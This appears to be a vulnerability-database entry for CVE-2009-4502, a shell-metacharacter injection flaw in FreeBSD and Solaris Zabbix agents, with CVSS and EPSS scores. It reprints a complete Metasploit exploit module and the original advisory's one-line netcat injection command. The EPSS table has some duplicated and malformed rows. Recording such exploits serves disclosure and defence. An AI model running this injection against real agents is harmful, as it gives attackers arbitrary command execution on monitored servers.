CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The NET_TCP_LISTEN function in net.c in Zabbix Agent before 1.6.7, when running on FreeBSD or Solaris, allows remote attackers to bypass the EnableRemoteCommands setting and execute arbitrary commands via shell metacharacters in the argument to net.tcp.listen. NOTE: this attack is limited to attacks from trusted IP addresses.
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
71.79%
–
–
2023-03-12
–
–
–
61.08%
–
2023-04-16
–
–
–
58.91%
–
2023-06-04
–
–
–
64.28%
–
2023-07-16
–
–
–
61.44%
–
2023-12-10
–
–
–
61.44%
–
2024-01-07
–
–
–
57.2%
–
2024-02-11
–
–
–
90.72%
–
2024-03-17
–
–
–
91.33%
–
2024-04-14
–
–
–
91.27%
–
2024-06-02
–
–
–
92.76%
–
2024-09-22
–
–
–
65.21%
–
2024-12-22
–
–
–
69.56%
–
2025-02-23
–
–
–
65.19%
–
2025-01-19
–
–
–
69.56%
–
2025-02-23
–
–
–
65.19%
–
2025-03-18
–
–
–
–
63.55%
2025-03-18
–
–
–
–
63.55,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: zabbix_agent_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
'Description' => %q{
This module exploits a metacharacter injection vulnerability
in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
can only be exploited if the attacker can hijack the IP address
of an authorized server (as defined in the configuration file).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2009-4502' ],
[ 'OSVDB', '60956' ],
[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "'",
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 10 2009'))
register_options(
[
Opt::RPORT(10050)
], self.class)
end
def exploit
connect
rnd_port = rand(1024) + 1
buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"
print_status("Sending net.tcp.listen() request to the zabbix agent...")
sock.put(buf)
res = nil
begin
res = sock.get_once(-1, 5)
rescue ::EOFError
end
if ! res
print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
disconnect
return
end
if (res =~ /ZBX_NOTSUPPORTED/)
print_status("The zabbix agent is not running a vulnerable version or operating system.")
disconnect
return
end
if(res !~ /ZBXD/)
print_status("The zabbix agent returned an unknown response.")
disconnect
return
end
print_status("The zabbix agent should have executed our command.")
disconnect
end
end
Zabbix Agent : Bypass of EnableRemoteCommands=0 From: Nicob <nicob () nicob net>
Date: Sun, 13 Dec 2009 16:28:30 +0100
From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."
[Zabbix Agent : Bypass of EnableRemoteCommands=0]
Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7
Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c
Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address
Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents